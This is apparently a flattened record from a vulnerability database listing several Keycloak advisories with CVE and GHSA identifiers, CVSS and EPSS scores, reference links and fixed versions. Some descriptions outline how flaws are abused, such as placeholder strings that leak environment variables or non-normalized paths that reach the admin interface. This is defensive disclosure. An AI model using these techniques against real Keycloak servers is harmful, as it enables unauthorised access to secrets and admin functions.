reference_id cpe:/a:redhat:build_keycloak:26.0::el9
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:26.0::el9
13
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:jboss_enterprise_application_platform:8
reference_id cpe:/a:redhat:jboss_enterprise_application_platform:8
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:jboss_enterprise_application_platform:8
14
reference_url https://access.redhat.com/security/cve/CVE-2024-9666
reference_id CVE-2024-9666
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value 5.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-11-25T17:14:55Z/
url https://access.redhat.com/security/cve/CVE-2024-9666
15
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-9666
reference_id CVE-2024-9666
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value 5.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-9666
16
reference_url https://github.com/advisories/GHSA-jgwc-jh89-rpgq
reference_id GHSA-jgwc-jh89-rpgq
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-jgwc-jh89-rpgq
17
reference_url https://github.com/keycloak/keycloak/security/advisories/GHSA-jgwc-jh89-rpgq
reference_id GHSA-jgwc-jh89-rpgq
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value 5.7
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
3
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/security/advisories/GHSA-jgwc-jh89-rpgq
fixed_packages
0
url pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
purl pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-13cd-jace-rfdu
1
vulnerability VCID-a1me-1k15-2kdt
2
vulnerability VCID-cax3-qsfb-yfc9
3
vulnerability VCID-hq42-c3pr-qkbf
4
vulnerability VCID-vtut-sg7s-xqf4
5
vulnerability VCID-wgaj-esqz-27fk
6
vulnerability VCID-zv3y-skx5-53ge
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
aliases CVE-2024-9666, GHSA-jgwc-jh89-rpgq
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-azrr-bwad-97cs
5
url VCID-cax3-qsfb-yfc9
vulnerability_id VCID-cax3-qsfb-yfc9
summary 
Duplicate Advisory:  Keycloak allows access to admin path through flaw
### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-j4vq-q93m-4683. This link is maintained to preserve external references.

### Original Description
A flaw was found in Keycloak. The Keycloak guides recommend to not expose /admin path to the outside in case the installation is using a proxy. The issue occurs at least via ha-proxy, as it can be tricked to using relative/non-normalized paths to access the /admin application path relative to /realms which is expected to be exposed.
references
0
reference_url https://access.redhat.com/errata/RHSA-2025:21370
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2025:21370
1
reference_url https://access.redhat.com/errata/RHSA-2025:21371
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2025:21371
2
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2398025
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://bugzilla.redhat.com/show_bug.cgi?id=2398025
3
reference_url https://github.com/keycloak/keycloak
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak
4
reference_url https://github.com/keycloak/keycloak/issues/43763
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/issues/43763
5
reference_url https://github.com/keycloak/keycloak/pull/43765
reference_id
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/pull/43765
6
reference_url https://access.redhat.com/security/cve/CVE-2025-10939
reference_id CVE-2025-10939
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/security/cve/CVE-2025-10939
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-10939
reference_id CVE-2025-10939
reference_type
scores
0
value 3.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-10939
8
reference_url https://github.com/advisories/GHSA-c6cm-5gc7-c3f4
reference_id GHSA-c6cm-5gc7-c3f4
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-c6cm-5gc7-c3f4
fixed_packages
0
url pkg:maven/org.keycloak/keycloak-quarkus-server@26.4.3
purl pkg:maven/org.keycloak/keycloak-quarkus-server@26.4.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-a1me-1k15-2kdt
1
vulnerability VCID-wgaj-esqz-27fk
2
vulnerability VCID-zv3y-skx5-53ge
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.keycloak/keycloak-quarkus-server@26.4.3
aliases GHSA-c6cm-5gc7-c3f4
risk_score 1.6
exploitability 0.5
weighted_severity 3.3
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-cax3-qsfb-yfc9
6
url VCID-hq42-c3pr-qkbf
vulnerability_id VCID-hq42-c3pr-qkbf
summary 
Keycloak allows unrestricted admin use of system and environment variables
A security vulnerability has been identified that allows admin users to access sensitive server environment variables and system properties through user-configurable URLs. Specifically, when configuring backchannel logout URLs or admin URLs, admin users can include placeholders like ${env.VARNAME} or ${PROPNAME}. The server replaces these placeholders with the actual values of environment variables or system properties during URL processing.
references
0
reference_url https://access.redhat.com/errata/RHSA-2025:0299
reference_id
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-14T14:44:22Z/
url https://access.redhat.com/errata/RHSA-2025:0299
1
reference_url https://access.redhat.com/errata/RHSA-2025:0300
reference_id
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-14T14:44:22Z/
url https://access.redhat.com/errata/RHSA-2025:0300
2
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-11736.json
reference_id
reference_type
scores
0
value 4.9
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-11736.json
3
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-11736
reference_id
reference_type
scores
0
value 0.00027
scoring_system epss
scoring_elements 0.08215
published_at 2026-06-09T12:55:00Z
1
value 0.00027
scoring_system epss
scoring_elements 0.08256
published_at 2026-06-05T12:55:00Z
2
value 0.00027
scoring_system epss
scoring_elements 0.08269
published_at 2026-06-06T12:55:00Z
3
value 0.00027
scoring_system epss
scoring_elements 0.08247
published_at 2026-06-07T12:55:00Z
4
value 0.00027
scoring_system epss
scoring_elements 0.08196
published_at 2026-06-08T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-11736
4
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2328850
reference_id
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-14T14:44:22Z/
url https://bugzilla.redhat.com/show_bug.cgi?id=2328850
5
reference_url https://github.com/keycloak/keycloak
reference_id
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak
6
reference_url https://github.com/keycloak/keycloak/commit/7a76858fe4aa39a39fb6b86dd3d2c113d9c59854
reference_id
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/commit/7a76858fe4aa39a39fb6b86dd3d2c113d9c59854
7
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:26.0
reference_id cpe:/a:redhat:build_keycloak:26.0
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:26.0
8
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:26.0::el9
reference_id cpe:/a:redhat:build_keycloak:26.0::el9
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:26.0::el9
9
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:jbosseapxp
reference_id cpe:/a:redhat:jbosseapxp
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:jbosseapxp
10
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:jboss_enterprise_application_platform:8
reference_id cpe:/a:redhat:jboss_enterprise_application_platform:8
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:jboss_enterprise_application_platform:8
11
reference_url https://access.redhat.com/security/cve/CVE-2024-11736
reference_id CVE-2024-11736
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-14T14:44:22Z/
url https://access.redhat.com/security/cve/CVE-2024-11736
12
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-11736
reference_id CVE-2024-11736
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-11736
13
reference_url https://github.com/advisories/GHSA-f4v7-3mww-9gc2
reference_id GHSA-f4v7-3mww-9gc2
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-f4v7-3mww-9gc2
14
reference_url https://github.com/keycloak/keycloak/security/advisories/GHSA-f4v7-3mww-9gc2
reference_id GHSA-f4v7-3mww-9gc2
reference_type
scores
0
value 4.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/security/advisories/GHSA-f4v7-3mww-9gc2
fixed_packages
0
url pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.8
purl pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.8
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-a1me-1k15-2kdt
1
vulnerability VCID-cax3-qsfb-yfc9
2
vulnerability VCID-vtut-sg7s-xqf4
3
vulnerability VCID-wgaj-esqz-27fk
4
vulnerability VCID-zv3y-skx5-53ge
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.8
aliases CVE-2024-11736, GHSA-f4v7-3mww-9gc2
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-hq42-c3pr-qkbf
7
url VCID-msgd-763n-quhp
vulnerability_id VCID-msgd-763n-quhp
summary 
Duplicate Advisory: Keycloak Path Traversal Vulnerability Due to External Control of File Name or Path
## Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-5545-r4hg-rj4m. This link is maintained to preserve external references.

## Original Description
A vulnerability was found in Keycloak. A user with high privileges could read sensitive information from a Vault file that is not within the expected context. This attacker must have previous high access to the Keycloak server in order to perform resource creation, for example, an LDAP provider configuration and set up a Vault read file, which will only inform whether that file exists or not.
references
0
reference_url https://access.redhat.com/errata/RHSA-2024:10175
reference_id
reference_type
scores
0
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2024:10175
1
reference_url https://access.redhat.com/errata/RHSA-2024:10176
reference_id
reference_type
scores
0
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2024:10176
2
reference_url https://access.redhat.com/errata/RHSA-2024:10177
reference_id
reference_type
scores
0
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2024:10177
3
reference_url https://access.redhat.com/errata/RHSA-2024:10178
reference_id
reference_type
scores
0
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2024:10178
4
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2322447
reference_id
reference_type
scores
0
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://bugzilla.redhat.com/show_bug.cgi?id=2322447
5
reference_url https://access.redhat.com/security/cve/CVE-2024-10492
reference_id CVE-2024-10492
reference_type
scores
0
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/security/cve/CVE-2024-10492
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-10492
reference_id CVE-2024-10492
reference_type
scores
0
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
1
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-10492
7
reference_url https://github.com/advisories/GHSA-6vrw-mpj8-3j59
reference_id GHSA-6vrw-mpj8-3j59
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-6vrw-mpj8-3j59
fixed_packages
0
url pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
purl pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-13cd-jace-rfdu
1
vulnerability VCID-a1me-1k15-2kdt
2
vulnerability VCID-cax3-qsfb-yfc9
3
vulnerability VCID-hq42-c3pr-qkbf
4
vulnerability VCID-vtut-sg7s-xqf4
5
vulnerability VCID-wgaj-esqz-27fk
6
vulnerability VCID-zv3y-skx5-53ge
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
aliases GHSA-6vrw-mpj8-3j59
risk_score 1.4
exploitability 0.5
weighted_severity 2.7
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-msgd-763n-quhp
8
url VCID-pewx-mrx1-7ke6
vulnerability_id VCID-pewx-mrx1-7ke6
summary 
Keycloak on Quarkus CLI option for encrypted JGroups ignored
The env option `KC_CACHE_EMBEDDED_MTLS_ENABLED` does not work and the jgroups replication configuration is always used in plain. This option worked before in 24 and 22. More info in public issue https://github.com/keycloak/keycloak/issues/34644.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-10973.json
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-10973.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-10973
reference_id
reference_type
scores
0
value 0.0003
scoring_system epss
scoring_elements 0.08963
published_at 2026-06-09T12:55:00Z
1
value 0.0003
scoring_system epss
scoring_elements 0.08985
published_at 2026-06-05T12:55:00Z
2
value 0.0003
scoring_system epss
scoring_elements 0.09002
published_at 2026-06-06T12:55:00Z
3
value 0.0003
scoring_system epss
scoring_elements 0.08982
published_at 2026-06-07T12:55:00Z
4
value 0.0003
scoring_system epss
scoring_elements 0.08935
published_at 2026-06-08T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-10973
2
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2324361
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-12-18T16:25:38Z/
url https://bugzilla.redhat.com/show_bug.cgi?id=2324361
3
reference_url https://github.com/keycloak/keycloak
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak
4
reference_url https://github.com/keycloak/keycloak/commit/071032a108bd9e9fce9e66d00c36d56bd4b334df
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/commit/071032a108bd9e9fce9e66d00c36d56bd4b334df
5
reference_url https://github.com/keycloak/keycloak/commit/36defd5f33b2da5d705f179bbaa21c28b13a9996
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/commit/36defd5f33b2da5d705f179bbaa21c28b13a9996
6
reference_url https://github.com/keycloak/keycloak/issues/28750
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/issues/28750
7
reference_url https://github.com/keycloak/keycloak/issues/34644
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/issues/34644
8
reference_url https://github.com/keycloak/keycloak/pull/28756
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/pull/28756
9
reference_url https://github.com/keycloak/keycloak/pull/34668
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/pull/34668
10
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:
reference_id cpe:/a:redhat:build_keycloak:
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:build_keycloak:
11
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:jbosseapxp
reference_id cpe:/a:redhat:jbosseapxp
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:jbosseapxp
12
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:jboss_enterprise_application_platform:8
reference_id cpe:/a:redhat:jboss_enterprise_application_platform:8
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:/a:redhat:jboss_enterprise_application_platform:8
13
reference_url https://access.redhat.com/security/cve/CVE-2024-10973
reference_id CVE-2024-10973
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-12-18T16:25:38Z/
url https://access.redhat.com/security/cve/CVE-2024-10973
14
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-10973
reference_id CVE-2024-10973
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-10973
15
reference_url https://github.com/advisories/GHSA-g6qq-c9f9-2772
reference_id GHSA-g6qq-c9f9-2772
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-g6qq-c9f9-2772
16
reference_url https://github.com/keycloak/keycloak/security/advisories/GHSA-g6qq-c9f9-2772
reference_id GHSA-g6qq-c9f9-2772
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/keycloak/keycloak/security/advisories/GHSA-g6qq-c9f9-2772
fixed_packages
0
url pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
purl pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-13cd-jace-rfdu
1
vulnerability VCID-a1me-1k15-2kdt
2
vulnerability VCID-cax3-qsfb-yfc9
3
vulnerability VCID-hq42-c3pr-qkbf
4
vulnerability VCID-vtut-sg7s-xqf4
5
vulnerability VCID-wgaj-esqz-27fk
6
vulnerability VCID-zv3y-skx5-53ge
resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.keycloak/keycloak-quarkus-server@26.0.6
aliases CVE-2024-10973, GHSA-g6qq-c9f9-2772
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-pewx-mrx1-7ke6
9
url VCID-rhzn-51yv-q7ef
vulnerability_id VCID-rhzn-51yv-q7ef
summary 
Duplicate Advisory: Keycloak proxy header handling Denial-of-Service (DoS) vulnerability
## Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-jgwc-jh89-rpgq. This link is maintained to preserve external references.

## Original Description
A vulnerability was found in the Keycloak Server. The Keycloak Server is vulnerable to a denial of service (DoS) attack due to improper handling of proxy headers. When Keycloak is configured to accept incoming proxy headers, it may accept non-IP values, such as obfuscated identifiers, without proper validation. This issue can lead to costly DNS resolution operations, which an attacker could exploit to tie up IO threads and potentially cause a denial of service.
The attacker must have access to send requests to a Keycloak instance that is configured to accept proxy headers, specifically when reverse proxies do not overwrite incoming headers, and Keycloak is configured to trust these headers.
references
0
reference_url https://access.redhat.com/errata/RHSA-2024:10175
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2024:10175
1
reference_url https://access.redhat.com/errata/RHSA-2024:10176
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2024:10176
2
reference_url https://access.redhat.com/errata/RHSA-2024:10177
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2024:10177
3
reference_url https://access.redhat.com/errata/RHSA-2024:10178
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/errata/RHSA-2024:10178
4
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2317440
reference_id
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://bugzilla.redhat.com/show_bug.cgi?id=2317440
5
reference_url https://access.redhat.com/security/cve/CVE-2024-9666
reference_id CVE-2024-9666
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://access.redhat.com/security/cve/CVE-2024-9666
6
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-9666
reference_id CVE-2024-9666
reference_type
scores
0
value 4.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-9666
7
reference_url https://github.com/advisories/GHSA-pcx7-8hxg-j823
